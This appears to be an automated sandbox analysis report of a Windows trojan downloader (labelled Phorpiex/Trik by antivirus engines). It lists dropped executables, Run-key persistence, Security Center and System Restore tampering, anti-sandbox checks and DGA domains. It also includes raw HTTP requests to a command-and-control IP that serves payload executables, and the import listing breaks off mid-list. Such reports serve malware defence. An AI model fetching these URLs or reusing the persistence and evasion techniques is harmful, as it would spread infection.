Exes_606ac88c_1.json

1.  
2. [*] MalFamily: ""
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "Exes_606ac88c.1"
7. [*] File Size: 253440
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "f06bc76647c37e85b60aec384eba21a56a3dc2ddb0b962536b05f1b827fee8b1"
10. [*] MD5: "230ad5935436cf709dc1e06a6229c3b3"
11. [*] SHA1: "0c4a87cbdd0cb833e574d7ddec41b59b83b3d554"
12. [*] SHA512: "5d5ba9ad69f093475fddb2cefe365d86267d8eacb402e0ac3e6180cf96722f6a5938caa9fec79064ddce452b01838b730ea2b65d23f10e2209d6f26c92a3775e"
13. [*] CRC32: "606AC88C"
14. [*] SSDEEP: "6144:vR40u42cHaIKQ0xNuaDD4b7OeHMDzCTf:vRs5c6JxNuoTCT"
15.  
16. [*] Process Execution: [
17. "Exes_606ac88c.1",
18. "winnjdu.exe",
19. "1103737371.exe",
20. "3251136198.exe",
21. "wingzfw.exe",
22. "2451410298.exe",
23. "2940639086.exe",
24. "4227421410.exe"
25. ]
26.  
27. [*] Signatures Detected: [
28. {
29. "Description": "Creates RWX memory",
30. "Details": []
31. },
32. {
33. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
34. "Details": []
35. },
36. {
37. "Description": "Drops a binary and executes it",
38. "Details": [
39. {
40. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
41. },
42. {
43. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
44. },
45. {
46. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe"
47. },
48. {
49. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe"
50. },
51. {
52. "binary": "C:\\Windows\\2018222015062149\\winnjdu.exe"
53. },
54. {
55. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
56. },
57. {
58. "binary": "C:\\Windows\\3007640516827661\\wingzfw.exe"
59. }
60. ]
61. },
62. {
63. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
64. "Details": [
65. {
66. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
67. },
68. {
69. "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
70. },
71. {
72. "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
73. },
74. {
75. "suspicious_request": "http://193.32.161.77/1.exe"
76. },
77. {
78. "suspicious_request": "http://193.32.161.77/2.exe"
79. },
80. {
81. "suspicious_request": "http://193.32.161.77/3.exe"
82. },
83. {
84. "suspicious_request": "http://193.32.161.77/4.exe"
85. },
86. {
87. "suspicious_request": "http://193.32.161.77/5.exe"
88. }
89. ]
90. },
91. {
92. "Description": "Performs some HTTP requests",
93. "Details": [
94. {
95. "url": "http://193.32.161.77/tldr.php?new=1"
96. },
97. {
98. "url": "http://193.32.161.77/tldr.php?on=1"
99. },
100. {
101. "url": "http://193.32.161.77/1.exe"
102. },
103. {
104. "url": "http://193.32.161.77/2.exe"
105. },
106. {
107. "url": "http://193.32.161.77/3.exe"
108. },
109. {
110. "url": "http://193.32.161.77/4.exe"
111. },
112. {
113. "url": "http://193.32.161.77/5.exe"
114. }
115. ]
116. },
117. {
118. "Description": "Detects Sandboxie through the presence of a library",
119. "Details": []
120. },
121. {
122. "Description": "Detects SunBelt Sandbox through the presence of a library",
123. "Details": []
124. },
125. {
126. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
127. "Details": [
128. {
129. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier"
130. }
131. ]
132. },
133. {
134. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
135. "Details": [
136. {
137. "Spam": "3251136198.exe (1720) called API GlobalMemoryStatus 2165386 times"
138. },
139. {
140. "Spam": "4227421410.exe (2972) called API GlobalMemoryStatus 574213 times"
141. },
142. {
143. "Spam": "wingzfw.exe (596) called API GlobalMemoryStatus 2165386 times"
144. }
145. ]
146. },
147. {
148. "Description": "Installs itself for autorun at Windows startup",
149. "Details": [
150. {
151. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
152. },
153. {
154. "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
155. },
156. {
157. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
158. },
159. {
160. "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
161. }
162. ]
163. },
164. {
165. "Description": "Creates a hidden or system file",
166. "Details": [
167. {
168. "file": "C:\\Windows\\2018222015062149"
169. },
170. {
171. "file": "C:\\Windows\\2018222015062149\\winnjdu.exe"
172. },
173. {
174. "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
175. }
176. ]
177. },
178. {
179. "Description": "File has been identified by 43 Antiviruses on VirusTotal as malicious",
180. "Details": [
181. {
182. "MicroWorld-eScan": "Trojan.GenericKD.32053517"
183. },
184. {
185. "FireEye": "Generic.mg.230ad5935436cf70"
186. },
187. {
188. "McAfee": "Trojan-FQYR!230AD5935436"
189. },
190. {
191. "Cylance": "Unsafe"
192. },
193. {
194. "AegisLab": "Trojan.Win32.Trik.4!c"
195. },
196. {
197. "Alibaba": "TrojanDownloader:Win32/Trik.46992fc6"
198. },
199. {
200. "K7GW": "Riskware ( 0040eff71 )"
201. },
202. {
203. "Symantec": "Trojan.Gen.2"
204. },
205. {
206. "APEX": "Malicious"
207. },
208. {
209. "Paloalto": "generic.ml"
210. },
211. {
212. "Kaspersky": "Trojan-Downloader.Win32.Trik.fo"
213. },
214. {
215. "BitDefender": "Trojan.GenericKD.32053517"
216. },
217. {
218. "Avast": "Win32:CrypterX-gen [Trj]"
219. },
220. {
221. "Rising": "Worm.Phorpiex!8.48D (CLOUD)"
222. },
223. {
224. "Endgame": "malicious (moderate confidence)"
225. },
226. {
227. "Sophos": "Mal/Generic-S"
228. },
229. {
230. "Comodo": "Malware@#4velj06b5762"
231. },
232. {
233. "F-Secure": "Trojan.TR/AD.Phorpiex.uirrr"
234. },
235. {
236. "TrendMicro": "TROJ_GEN.R011C0GFD19"
237. },
238. {
239. "McAfee-GW-Edition": "BehavesLike.Win32.MultiPlug.dh"
240. },
241. {
242. "Trapmine": "malicious.high.ml.score"
243. },
244. {
245. "Emsisoft": "Trojan.GenericKD.32053517 (B)"
246. },
247. {
248. "SentinelOne": "DFI - Suspicious PE"
249. },
250. {
251. "Cyren": "W32/Trojan.MOZI-2355"
252. },
253. {
254. "ESET-NOD32": "a variant of Win32/Kryptik.GTXN"
255. },
256. {
257. "Webroot": "W32.Trojan.Gen"
258. },
259. {
260. "Avira": "TR/AD.Phorpiex.uirrr"
261. },
262. {
263. "Fortinet": "W32/Kryptik.GTVG!tr"
264. },
265. {
266. "Microsoft": "Worm:Win32/Phorpiex.AF!bit"
267. },
268. {
269. "Arcabit": "Trojan.Generic.D1E9190D"
270. },
271. {
272. "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fo"
273. },
274. {
275. "GData": "Trojan.GenericKD.32053517"
276. },
277. {
278. "AhnLab-V3": "Malware/Win32.Generic.C3288358"
279. },
280. {
281. "Acronis": "suspicious"
282. },
283. {
284. "ALYac": "Trojan.GenericKD.32053517"
285. },
286. {
287. "VBA32": "BScope.Trojan.AET.281105"
288. },
289. {
290. "Malwarebytes": "Trojan.MalPack.GS"
291. },
292. {
293. "TrendMicro-HouseCall": "TROJ_GEN.R011C0GFD19"
294. },
295. {
296. "Ikarus": "Trojan.Win32.Krypt"
297. },
298. {
299. "Ad-Aware": "Trojan.GenericKD.32053517"
300. },
301. {
302. "AVG": "Win32:CrypterX-gen [Trj]"
303. },
304. {
305. "Panda": "Trj/GdSda.A"
306. },
307. {
308. "CrowdStrike": "win/malicious_confidence_70% (W)"
309. }
310. ]
311. },
312. {
313. "Description": "Operates on local firewall's policies and settings",
314. "Details": []
315. },
316. {
317. "Description": "Creates a copy of itself",
318. "Details": [
319. {
320. "copy": "C:\\Windows\\2018222015062149\\winnjdu.exe"
321. },
322. {
323. "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
324. }
325. ]
326. },
327. {
328. "Description": "Attempts to disable System Restore",
329. "Details": []
330. },
331. {
332. "Description": "Attempts to modify or disable Security Center warnings",
333. "Details": []
334. },
335. {
336. "Description": "Likely use of Domain Generation Algorithm (DGA)",
337. "Details": []
338. },
339. {
340. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
341. "Details": [
342. {
343. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier"
344. },
345. {
346. "file": "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier"
347. }
348. ]
349. },
350. {
351. "Description": "Anomalous binary characteristics",
352. "Details": [
353. {
354. "anomaly": "Found duplicated section names"
355. }
356. ]
357. },
358. {
359. "Description": "Created network traffic indicative of malicious activity",
360. "Details": [
361. {
362. "signature": "ET DROP Dshield Block Listed Source group 1"
363. },
364. {
365. "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
366. },
367. {
368. "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
369. }
370. ]
371. }
372. ]
373.  
374. [*] Started Service: []
375.  
376. [*] Executed Commands: [
377. "C:\\Windows\\2018222015062149\\winnjdu.exe",
378. "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
379. "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
380. "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
381. ]
382.  
383. [*] Mutexes: [
384. "976857468"
385. ]
386.  
387. [*] Modified Files: [
388. "C:\\Windows\\2018222015062149\\winnjdu.exe",
389. "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
390. "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
391. "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
392. "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe",
393. "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe",
394. "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
395. ]
396.  
397. [*] Deleted Files: [
398. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier",
399. "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier",
400. "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier",
401. "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe:Zone.Identifier",
402. "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe:Zone.Identifier",
403. "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe:Zone.Identifier"
404. ]
405.  
406. [*] Modified Registry Keys: [
407. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
408. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
409. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
410. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
411. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
412. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
413. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
414. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
415. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
416. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
417. ]
418.  
419. [*] Deleted Registry Keys: []
420.  
421. [*] DNS Communications: [
422. {
423. "type": "A",
424. "request": "aiheiufisd.su",
425. "answers": [
426. {
427. "data": "",
428. "type": "NXDOMAIN"
429. }
430. ]
431. },
432. {
433. "type": "A",
434. "request": "aeoghehofu.su",
435. "answers": [
436. {
437. "data": "",
438. "type": "NXDOMAIN"
439. }
440. ]
441. },
442. {
443. "type": "A",
444. "request": "aniaeninie.su",
445. "answers": [
446. {
447. "data": "",
448. "type": "NXDOMAIN"
449. }
450. ]
451. },
452. {
453. "type": "A",
454. "request": "aiaeufaehe.su",
455. "answers": [
456. {
457. "data": "",
458. "type": "NXDOMAIN"
459. }
460. ]
461. },
462. {
463. "type": "A",
464. "request": "aieieieros.su",
465. "answers": [
466. {
467. "data": "",
468. "type": "NXDOMAIN"
469. }
470. ]
471. },
472. {
473. "type": "A",
474. "request": "abaeubuegs.su",
475. "answers": [
476. {
477. "data": "",
478. "type": "NXDOMAIN"
479. }
480. ]
481. },
482. {
483. "type": "A",
484. "request": "aeubeufubg.su",
485. "answers": [
486. {
487. "data": "",
488. "type": "NXDOMAIN"
489. }
490. ]
491. },
492. {
493. "type": "A",
494. "request": "aeuaueudgs.su",
495. "answers": [
496. {
497. "data": "",
498. "type": "NXDOMAIN"
499. }
500. ]
501. },
502. {
503. "type": "A",
504. "request": "xiheiufisd.su",
505. "answers": [
506. {
507. "data": "",
508. "type": "NXDOMAIN"
509. }
510. ]
511. },
512. {
513. "type": "A",
514. "request": "xeoghehofu.su",
515. "answers": [
516. {
517. "data": "",
518. "type": "NXDOMAIN"
519. }
520. ]
521. },
522. {
523. "type": "A",
524. "request": "xniaeninie.su",
525. "answers": [
526. {
527. "data": "",
528. "type": "NXDOMAIN"
529. }
530. ]
531. },
532. {
533. "type": "A",
534. "request": "xiaeufaehe.su",
535. "answers": [
536. {
537. "data": "",
538. "type": "NXDOMAIN"
539. }
540. ]
541. },
542. {
543. "type": "A",
544. "request": "xieieieros.su",
545. "answers": [
546. {
547. "data": "",
548. "type": "NXDOMAIN"
549. }
550. ]
551. },
552. {
553. "type": "A",
554. "request": "xbaeubuegs.su",
555. "answers": [
556. {
557. "data": "",
558. "type": "NXDOMAIN"
559. }
560. ]
561. },
562. {
563. "type": "A",
564. "request": "teubeufubg.su",
565. "answers": [
566. {
567. "data": "",
568. "type": "NXDOMAIN"
569. }
570. ]
571. },
572. {
573. "type": "A",
574. "request": "teuaueudgs.su",
575. "answers": [
576. {
577. "data": "",
578. "type": "NXDOMAIN"
579. }
580. ]
581. },
582. {
583. "type": "A",
584. "request": "tiheiufisd.su",
585. "answers": [
586. {
587. "data": "",
588. "type": "NXDOMAIN"
589. }
590. ]
591. },
592. {
593. "type": "A",
594. "request": "teoghehofu.su",
595. "answers": [
596. {
597. "data": "",
598. "type": "NXDOMAIN"
599. }
600. ]
601. },
602. {
603. "type": "A",
604. "request": "tniaeninie.su",
605. "answers": [
606. {
607. "data": "",
608. "type": "NXDOMAIN"
609. }
610. ]
611. },
612. {
613. "type": "A",
614. "request": "tiaeufaehe.su",
615. "answers": [
616. {
617. "data": "",
618. "type": "NXDOMAIN"
619. }
620. ]
621. },
622. {
623. "type": "A",
624. "request": "tieieieros.su",
625. "answers": [
626. {
627. "data": "",
628. "type": "NXDOMAIN"
629. }
630. ]
631. },
632. {
633. "type": "A",
634. "request": "tbaeubuegs.su",
635. "answers": [
636. {
637. "data": "",
638. "type": "NXDOMAIN"
639. }
640. ]
641. },
642. {
643. "type": "A",
644. "request": "wiheiufisd.su",
645. "answers": [
646. {
647. "data": "",
648. "type": "NXDOMAIN"
649. }
650. ]
651. },
652. {
653. "type": "A",
654. "request": "weoghehofu.su",
655. "answers": [
656. {
657. "data": "",
658. "type": "NXDOMAIN"
659. }
660. ]
661. },
662. {
663. "type": "A",
664. "request": "wniaeninie.su",
665. "answers": [
666. {
667. "data": "",
668. "type": "NXDOMAIN"
669. }
670. ]
671. },
672. {
673. "type": "A",
674. "request": "wiaeufaehe.su",
675. "answers": [
676. {
677. "data": "",
678. "type": "NXDOMAIN"
679. }
680. ]
681. },
682. {
683. "type": "A",
684. "request": "wieieieros.su",
685. "answers": [
686. {
687. "data": "",
688. "type": "NXDOMAIN"
689. }
690. ]
691. },
692. {
693. "type": "A",
694. "request": "wbaeubuegs.su",
695. "answers": [
696. {
697. "data": "",
698. "type": "NXDOMAIN"
699. }
700. ]
701. },
702. {
703. "type": "A",
704. "request": "weubeufubg.su",
705. "answers": [
706. {
707. "data": "",
708. "type": "NXDOMAIN"
709. }
710. ]
711. },
712. {
713. "type": "A",
714. "request": "weuaueudgs.su",
715. "answers": [
716. {
717. "data": "",
718. "type": "NXDOMAIN"
719. }
720. ]
721. },
722. {
723. "type": "MX",
724. "request": "yahoo.com",
725. "answers": [
726. {
727. "data": "mta5.am0.yahoodns.net",
728. "type": "MX"
729. },
730. {
731. "data": "mta7.am0.yahoodns.net",
732. "type": "MX"
733. },
734. {
735. "data": "mta6.am0.yahoodns.net",
736. "type": "MX"
737. }
738. ]
739. },
740. {
741. "type": "A",
742. "request": "mta6.am0.yahoodns.net",
743. "answers": [
744. {
745. "data": "67.195.228.94",
746. "type": "A"
747. },
748. {
749. "data": "66.218.85.139",
750. "type": "A"
751. },
752. {
753. "data": "74.6.137.64",
754. "type": "A"
755. },
756. {
757. "data": "98.137.159.27",
758. "type": "A"
759. },
760. {
761. "data": "98.137.159.26",
762. "type": "A"
763. },
764. {
765. "data": "98.137.159.25",
766. "type": "A"
767. },
768. {
769. "data": "66.218.85.52",
770. "type": "A"
771. },
772. {
773. "data": "67.195.228.110",
774. "type": "A"
775. }
776. ]
777. }
778. ]
779.  
780. [*] Domains: [
781. {
782. "ip": "92.242.140.2",
783. "domain": "xiaeufaehe.su"
784. },
785. {
786. "ip": "92.242.140.2",
787. "domain": "tiaeufaehe.su"
788. },
789. {
790. "ip": "92.242.140.2",
791. "domain": "aieieieros.su"
792. },
793. {
794. "ip": "92.242.140.2",
795. "domain": "teuaueudgs.su"
796. },
797. {
798. "ip": "92.242.140.2",
799. "domain": "aniaeninie.su"
800. },
801. {
802. "ip": "92.242.140.2",
803. "domain": "weubeufubg.su"
804. },
805. {
806. "ip": "92.242.140.2",
807. "domain": "wbaeubuegs.su"
808. },
809. {
810. "ip": "92.242.140.2",
811. "domain": "wieieieros.su"
812. },
813. {
814. "ip": "92.242.140.2",
815. "domain": "wiaeufaehe.su"
816. },
817. {
818. "ip": "92.242.140.2",
819. "domain": "wiheiufisd.su"
820. },
821. {
822. "ip": "92.242.140.2",
823. "domain": "teoghehofu.su"
824. },
825. {
826. "ip": "92.242.140.2",
827. "domain": "aeoghehofu.su"
828. },
829. {
830. "ip": "92.242.140.2",
831. "domain": "wniaeninie.su"
832. },
833. {
834. "ip": "92.242.140.2",
835. "domain": "aiheiufisd.su"
836. },
837. {
838. "ip": "92.242.140.2",
839. "domain": "xiheiufisd.su"
840. },
841. {
842. "ip": "92.242.140.2",
843. "domain": "tniaeninie.su"
844. },
845. {
846. "ip": "74.6.137.64",
847. "domain": "mta6.am0.yahoodns.net"
848. },
849. {
850. "ip": "92.242.140.2",
851. "domain": "xieieieros.su"
852. },
853. {
854. "ip": "92.242.140.2",
855. "domain": "tbaeubuegs.su"
856. },
857. {
858. "ip": "92.242.140.2",
859. "domain": "aiaeufaehe.su"
860. },
861. {
862. "ip": "92.242.140.2",
863. "domain": "weoghehofu.su"
864. },
865. {
866. "ip": "92.242.140.2",
867. "domain": "xeoghehofu.su"
868. },
869. {
870. "ip": "92.242.140.2",
871. "domain": "abaeubuegs.su"
872. },
873. {
874. "ip": "92.242.140.2",
875. "domain": "xbaeubuegs.su"
876. },
877. {
878. "ip": "72.30.35.10",
879. "domain": "yahoo.com"
880. },
881. {
882. "ip": "92.242.140.2",
883. "domain": "tieieieros.su"
884. },
885. {
886. "ip": "92.242.140.2",
887. "domain": "aeubeufubg.su"
888. },
889. {
890. "ip": "92.242.140.2",
891. "domain": "aeuaueudgs.su"
892. },
893. {
894. "ip": "92.242.140.2",
895. "domain": "teubeufubg.su"
896. },
897. {
898. "ip": "92.242.140.2",
899. "domain": "xniaeninie.su"
900. },
901. {
902. "ip": "92.242.140.2",
903. "domain": "tiheiufisd.su"
904. },
905. {
906. "ip": "92.242.140.2",
907. "domain": "weuaueudgs.su"
908. }
909. ]
910.  
911. [*] Network Communication - ICMP: []
912.  
913. [*] Network Communication - HTTP: [
914. {
915. "count": 1,
916. "body": "",
917. "uri": "http://193.32.161.77/tldr.php?new=1",
918. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
919. "method": "GET",
920. "host": "193.32.161.77",
921. "version": "1.1",
922. "path": "/tldr.php?new=1",
923. "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
924. "port": 80
925. },
926. {
927. "count": 1,
928. "body": "",
929. "uri": "http://193.32.161.77/tldr.php?on=1",
930. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
931. "method": "GET",
932. "host": "193.32.161.77",
933. "version": "1.1",
934. "path": "/tldr.php?on=1",
935. "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
936. "port": 80
937. },
938. {
939. "count": 2,
940. "body": "",
941. "uri": "http://193.32.161.77/1.exe",
942. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
943. "method": "GET",
944. "host": "193.32.161.77",
945. "version": "1.1",
946. "path": "/1.exe",
947. "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
948. "port": 80
949. },
950. {
951. "count": 2,
952. "body": "",
953. "uri": "http://193.32.161.77/2.exe",
954. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
955. "method": "GET",
956. "host": "193.32.161.77",
957. "version": "1.1",
958. "path": "/2.exe",
959. "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
960. "port": 80
961. },
962. {
963. "count": 2,
964. "body": "",
965. "uri": "http://193.32.161.77/3.exe",
966. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
967. "method": "GET",
968. "host": "193.32.161.77",
969. "version": "1.1",
970. "path": "/3.exe",
971. "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
972. "port": 80
973. },
974. {
975. "count": 2,
976. "body": "",
977. "uri": "http://193.32.161.77/4.exe",
978. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
979. "method": "GET",
980. "host": "193.32.161.77",
981. "version": "1.1",
982. "path": "/4.exe",
983. "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
984. "port": 80
985. },
986. {
987. "count": 2,
988. "body": "",
989. "uri": "http://193.32.161.77/5.exe",
990. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
991. "method": "GET",
992. "host": "193.32.161.77",
993. "version": "1.1",
994. "path": "/5.exe",
995. "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
996. "port": 80
997. }
998. ]
999.  
1000. [*] Network Communication - SMTP: []
1001.  
1002. [*] Network Communication - Hosts: []
1003.  
1004. [*] Network Communication - IRC: []
1005.  
1006. [*] Static Analysis: {
1007. "pe": {
1008. "peid_signatures": null,
1009. "imports": [
1010. {
1011. "imports": [
1012. {
1013. "name": "ExitProcess",
1014. "address": "0x426000"
1015. },
1016. {
1017. "name": "DebugActiveProcessStop",
1018. "address": "0x426004"
1019. },
1020. {
1021. "name": "lstrcpynA",
1022. "address": "0x426008"
1023. },
1024. {
1025. "name": "UnlockFile",
1026. "address": "0x42600c"
1027. },
1028. {
1029. "name": "GetFileAttributesExA",
1030. "address": "0x426010"
1031. },
1032. {
1033. "name": "GetTickCount",
1034. "address": "0x426014"
1035. },
1036. {
1037. "name": "GetNumberFormatA",
1038. "address": "0x426018"
1039. },
1040. {
1041. "name": "GlobalAlloc",
1042. "address": "0x42601c"
1043. },
1044. {
1045. "name": "LoadLibraryW",
1046. "address": "0x426020"
1047. },
1048. {
1049. "name": "GetConsoleAliasExesLengthW",
1050. "address": "0x426024"
1051. },
1052. {
1053. "name": "GetBinaryTypeA",
1054. "address": "0x426028"
1055. },
1056. {
1057. "name": "lstrlenW",
1058. "address": "0x42602c"
1059. },
1060. {
1061. "name": "Module32First",
1062. "address": "0x426030"
1063. },
1064. {
1065. "name": "GetLastError",
1066. "address": "0x426034"
1067. },
1068. {
1069. "name": "GetProcAddress",
1070. "address": "0x426038"
1071. },
1072. {
1073. "name": "PeekConsoleInputW",
1074. "address": "0x42603c"
1075. },
1076. {
1077. "name": "WTSGetActiveConsoleSessionId",
1078. "address": "0x426040"
1079. },
1080. {
1081. "name": "VirtualProtect",
1082. "address": "0x426044"
1083. },
1084. {
1085. "name": "CreateToolhelp32Snapshot",
1086. "address": "0x426048"
1087. },
1088. {
1089. "name": "GetCPInfoExA",
1090. "address": "0x42604c"
1091. },
1092. {
1093. "name": "CloseHandle",
1094. "address": "0x426050"
1095. },
1096. {
1097. "name": "EncodePointer",
1098. "address": "0x426054"
1099. },
1100. {
1101. "name": "DecodePointer",
1102. "address": "0x426058"
1103. },
1104. {
1105. "name": "GetCommandLineA",
1106. "address": "0x42605c"
1107. },
1108. {
1109. "name": "RaiseException",
1110. "address": "0x426060"
1111. },
1112. {
1113. "name": "RtlUnwind",
1114. "address": "0x426064"
1115. },
1116. {
1117. "name": "IsDebuggerPresent",
1118. "address": "0x426068"
1119. },
1120. {
1121. "name": "IsProcessorFeaturePresent",
1122. "address": "0x42606c"
1123. },
1124. {
1125. "name": "EnterCriticalSection",
1126. "address": "0x426070"
1127. },
1128. {
1129. "name": "LeaveCriticalSection",
1130. "address": "0x426074"
1131. },
1132. {
1133. "name": "FlushFileBuffers",
1134. "address": "0x426078"
1135. },
1136. {
1137. "name": "WriteFile",
1138. "address": "0x42607c"
1139. },
1140. {
1141. "name": "WideCharToMultiByte",
1142. "address": "0x426080"
1143. },
1144. {
1145. "name": "GetConsoleCP",
1146. "address": "0x426084"
1147. },
1148. {
1149. "name": "GetConsoleMode",
1150. "address": "0x426088"
1151. },
1152. {
1153. "name": "DeleteCriticalSection",
1154. "address": "0x42608c"
1155. },
1156. {
1157. "name": "FatalAppExitA",
1158. "address": "0x426090"
1159. },
1160. {
1161. "name": "GetModuleHandleExW",
1162. "address": "0x426094"
1163. },
1164. {
1165. "name": "AreFileApisANSI",
1166. "address": "0x426098"
1167. },
1168. {
1169. "name": "MultiByteToWideChar",
1170. "address": "0x42609c"
1171. },
1172. {
1173. "name": "HeapSize",
1174. "address": "0x4260a0"
1175. },
1176. {
1177. "name": "HeapFree",
1178. "address": "0x4260a4"
1179. },
1180. {
1181. "name": "HeapAlloc",
1182. "address": "0x4260a8"
1183. },
1184. {
1185. "name": "SetLastError",
1186. "address": "0x4260ac"
1187. },
1188. {
1189. "name": "GetCurrentThread",
1190. "address": "0x4260b0"
1191. },
1192. {
1193. "name": "GetCurrentThreadId",
1194. "address": "0x4260b4"
1195. },
1196. {
1197. "name": "GetProcessHeap",
1198. "address": "0x4260b8"
1199. },
1200. {
1201. "name": "GetStdHandle",
1202. "address": "0x4260bc"
1203. },
1204. {
1205. "name": "GetFileType",
1206. "address": "0x4260c0"
1207. },
1208. {
1209. "name": "GetStartupInfoW",
1210. "address": "0x4260c4"
1211. },
1212. {
1213. "name": "GetModuleFileNameA",
1214. "address": "0x4260c8"
1215. },
1216. {
1217. "name": "GetModuleFileNameW",
1218. "address": "0x4260cc"
1219. },
1220. {
1221. "name": "QueryPerformanceCounter",
1222. "address": "0x4260d0"
1223. },
1224. {
1225. "name": "GetCurrentProcessId",
1226. "address": "0x4260d4"
1227. },
1228. {
1229. "name": "GetSystemTimeAsFileTime",
1230. "address": "0x4260d8"
1231. },
1232. {
1233. "name": "GetEnvironmentStringsW",
1234. "address": "0x4260dc"
1235. },
1236. {
1237. "name": "FreeEnvironmentStringsW",
1238. "address": "0x4260e0"
1239. },
1240. {
